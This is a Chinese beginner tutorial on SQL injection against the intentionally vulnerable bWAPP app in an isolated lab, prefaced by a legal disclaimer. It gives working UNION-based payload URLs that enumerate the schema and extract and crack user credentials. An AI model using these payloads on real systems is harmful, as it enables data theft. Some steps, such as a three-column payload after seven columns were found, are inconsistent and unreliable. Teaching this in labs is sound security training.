渗透入门之SQL 注入（1）

重要声明

SQL注入实验仅可在自己搭建的合法测试环境（如本地虚拟机、授权的测试服务器）中进行，严禁对任何非授权系统实施测试，否则可能违反《网络安全法》等法律法规，需承担相应法律责任。

一、 实验 环境

• 操作系统：Linux、Windows10,；

• 平台 ：天枢一体化虚拟仿真平台

1、 bwapp环境准备

• 环境部署：平台已完成部署
• 环境访问：浏览器输入http://192.168.0.100，点击"Login"进入登录页，默认账号密码：bee/bug；
• 安全级别设置：登录后点击顶部"Security Level"，选择"Low"（关闭基础防护，便于注入测试），点击"Apply"保存；
• 场景定位：点击顶部"Buggy Apps"，在下拉菜单中根据场景类型选择对应模块，即可进入目标测试页面。

（1） 使用前需要配置键盘

(2)IP配置（用户名bee,密码bug）

sudo ip addr add 192.168.0.100/24 dev 网卡名

二、 SQL注入常见场景分类及核心特征（bwapp环境适配）

SQL注入按请求方式、应用场景可分为6类，核心原理均为"用户输入未过滤直接拼接SQL"，但注入点位置、参数传递方式存在差异。

1、 SQL Injection (GET/Search)：GET请求搜索类注入

bwapp场景定位Buggy Apps > SQL Injection > "SQL Injection - Search (GET)"实验步骤正常业务验证：进入测试页面，在搜索框输入Man，点击"Search"，页面显示包含"Man"的用户信息（正常响应）；

（ 1 ） 步骤 1 ：判断注入点类型及存在性

在搜索框输入man'（添加单引号），点击"Search"，页面显示MySQL语法错误（如You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''bee''' at line 1），说明存在字符型注入；

注释符验证：输入man' -- （注意--后加空格），点击"Search"，页面无语法错误且正常显示结果，确认注入点有效；

（ 2 ） 步骤 2 ：判断查询的字段数：

① 判断列数：输入Man' order by 1-- - ，点击"Search"，页面正常显示，依次输入，至此说明查询结果为7列；

② 利用MySQL自带的information_schema库，提取当前数据库名、版本、用户等信息：

|---------|------------------------------------------------------------------------------------------|
| 目标信息 | 构造URL示例 |
| 当前数据库名 | http://192.168.0.100/bwapp/sqli_1.php?title=man' union select 1,database(),3，4,5,6,7-- - |
| MySQL版本 | http://192.168.0.100/bwapp/sqli_1.php?title=man' union select 1,version(),3，4,5,6,7-- - |
| 数据库用户 | http://192.168.0.100/bwapp/sqli_1.php?title=man' union select 1,user(),3，4,5,6,7-- - |
| 数据存储目录 | http://192.168.0.100/bwapp/sqli_1.php?title=man' union select 1,@@datadir,3,4,5,6,7-- - |

示例结果：

当前数据库名是bwapp，

MySQL版本为5.0.96，

用户为root@localhost。

数据存储目录

（ 3 ） 步骤 3 ：获取数据库中的表名

提取bwapp数据库下的所有表名（重点关注users表，存储账号密码）：

|-------------------------------------------------------------------------------------------------------------------------------------------------------|
| http://192.168.0.100/bwapp/sqli_1.php?title=man' UNION SELECT 1,table_name,3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()-- - |

页面会列出表名：users、movies、blogs、guestbook等（核心目标：users）。

（ 4 ） 步骤 4 ：获取users表的列名

提取users表的所有列名（如账号、密码、邮箱等）：

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| http://192.168.0.100/bwapp/sqli_1.php?title=man' UNION SELECT 1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_schema=database() AND table_name='users' -- - |

页面会显示列名：id、username、password、email、admin等。

（ 5 ） 步骤 5 ：提取users表的账号密码数据

最终目标：获取用户凭证，构造URL如下：因本次用户名在login列

|------------------------------------------------------------------------------------------------|
| http://192.168.0.100/bwapp/sqli_1.php?title=man' UNION SELECT 1,login,password FROM users -- - |

页面会显示：

解密MD5值，bee→bug（与BWAPP默认密码一致）。

（ 6 ） 步骤 6 ：验证结果

用提取到的bee→bug登录BWAPP，验证账号密码的有效性。